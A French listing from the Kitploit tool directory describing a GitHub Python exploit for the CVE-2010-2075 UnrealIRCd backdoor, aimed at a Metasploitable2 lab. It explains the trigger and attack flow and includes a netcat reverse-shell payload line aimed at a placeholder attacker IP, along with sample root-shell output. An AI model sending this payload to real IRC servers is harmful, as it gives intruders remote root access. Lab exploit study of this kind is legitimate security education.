Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2010-2075 — Exploit de la backdoor UnrealIRCd 3.2.8.1 — reverse shell via AB ; déclencheur, développé de zéro en Python à l'aide de sockets bruts. Pas de Metasploit. | Kitploit
Outils/GitHubGitHub/rushikesh-a-bhujbal/cve-2010-2075
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionSécurité de la Chaîne LogistiqueApprentissage et ÉducationRed Teaming
Développement de Charges Utiles
Labs et Pratique
GitHubrushikesh-a-bhujbal/cve-2010-2075

CVE-2010-2075

Exploit de la backdoor UnrealIRCd 3.2.8.1 — reverse shell via AB ; déclencheur, développé de zéro en Python à l'aide de sockets bruts. Pas de Metasploit.

Voir le dépôt
1il y a 10h 36mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2010-2075 — Exploit de la porte dérobée d'UnrealIRCd 3.2.8.1

Python Platform Target License


Aperçu

UnrealIRCd est un serveur IRC (Internet Relay Chat) open source — un protocole qui permet aux utilisateurs de communiquer en temps réel sur un réseau, similaire aux premières plateformes de messagerie.

En 2009–2010, il a été découvert que la version 3.2.8.1 d'UnrealIRCd distribuée via les miroirs de téléchargement officiels avait été compromise. Un attaquant avait remplacé le code source légitime par une version contenant une porte dérobée avec un déclencheur d'exécution de commandes caché.

Il s'agissait d'une attaque par chaîne d'approvisionnement — de nature identique à CVE-2011-2523 (vsftpd 2.3.4). Le logiciel légitime a été remplacé par une version malveillante modifiée avant que les utilisateurs ne le téléchargent.


Fonctionnement de la porte dérobée

La porte dérobée surveille toutes les données entrantes sur le port 6667. Si une entrée commence par la chaîne , tout ce qui suit est transmis — contournant entièrement toute la logique IRC, l'authentification et les vérifications d'enregistrement.

AB;
directement à system()

Le déclencheur s'active pendant la phase d'initialisation de la connexion, avant même que le serveur IRC n'enregistre le client. Aucun NICK, aucun USER, aucune authentification requise.

Flux d'attaque :

root@kitploit:~
Attacker (Kali)                    Target (Metasploitable2)
                                   
1. s1 connects to port 6667   
   NICK + USER handshake      →    Server sends full banner
   Read banner, check version  
   Confirm Unreal3.2.8.1      
                                   
2. Open listener on port 4444  
   (waiting for incoming shell)
                                   
3. s2 connects to port 6667   →    AB; nc -e /bin/bash KALI_IP 4444
                               →    system() executes immediately
                               →    netcat spawns bash, connects back
                                   
4. listener.accept()          ←    Incoming root shell connection
   Interactive root shell      

Reverse Shell vs Bind Shell

Cet exploit utilise un reverse shell — la cible se reconnecte à l'attaquant, plutôt que l'attaquant ne se connecte à un port sur la cible.

TypeDirectionUtilisé dans
Bind shellAttaquant → CibleCVE-2011-2523 (vsftpd)
Reverse shellCible → AttaquantCVE-2010-2075 (UnrealIRCd)

Les reverse shells contournent les règles de pare-feu entrantes — les connexions sortantes depuis la cible sont rarement bloquées.


Prérequis

  • Python 3.x
  • Aucune bibliothèque externe — bibliothèque standard uniquement
  • netcat installé sur la cible (présent par défaut sur Metasploitable2)
  • Cible : Metasploitable2 exécutant UnrealIRCd 3.2.8.1

Utilisation

root@kitploit:~
git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075

Modifiez main.py et définissez :

root@kitploit:~
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"

Exécutez :

root@kitploit:~
python3 main.py

Exemple de sortie :

root@kitploit:~
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit

Gestion des erreurs

ScénarioComportement
Port 6667 ferméAffiche "Port Closed", se termine proprement
Mauvaise versionAffiche "Not vulnerable", se termine proprement
La cible ne rappelle paslistener.accept() attend (ajoutez un timeout si nécessaire)
La commande ne produit aucune sortierecv() expire silencieusement, retour à l'invite

Différence clé avec CVE-2011-2523

CVE-2011-2523 (vsftpd)CVE-2010-2075 (UnrealIRCd)
ProtocoleFTP (port 21)IRC (port 6667)
Déclencheur:) dans le nom d'utilisateurPréfixe AB; sur toute entrée
Type de shellBind shell (port 6200)Reverse shell (port de l'attaquant)
Connexions2 sortantes1 sortante + 1 entrante

Testé contre

  • Metasploitable2 (VM intentionnellement vulnérable)
  • UnrealIRCd 3.2.8.1
  • Linux metasploitable 2.6.24-16-server

Avertissement légal

Cet exploit est développé strictement à des fins éducatives et pour la recherche en sécurité autorisée uniquement.

Développé et testé exclusivement contre une machine virtuelle Metasploitable2 locale dans un environnement de laboratoire entièrement isolé.

N'utilisez pas ceci contre un système que vous ne possédez pas ou pour lequel vous n'avez pas la permission écrite explicite de tester. L'utilisation non autorisée est illégale en vertu du Computer Fraud and Abuse Act (CFAA) et des lois équivalentes dans le monde entier.

L'auteur n'accepte aucune responsabilité pour l'utilisation abusive de ce code.


Références

  • Enregistrement CVE : https://www.cve.org/CVERecord?id=CVE-2010-2075
  • Entrée NVD : https://nvd.nist.gov/vuln/detail/CVE-2010-2075
  • Divulgation originale : https://www.exploit-db.com/exploits/13853
  • Metasploitable2 : https://sourceforge.net/projects/metasploitable/

Auteur

Rushikesh Bhujbal
Recherche en sécurité et développement d'exploits
GitHub

Télécharger l’outil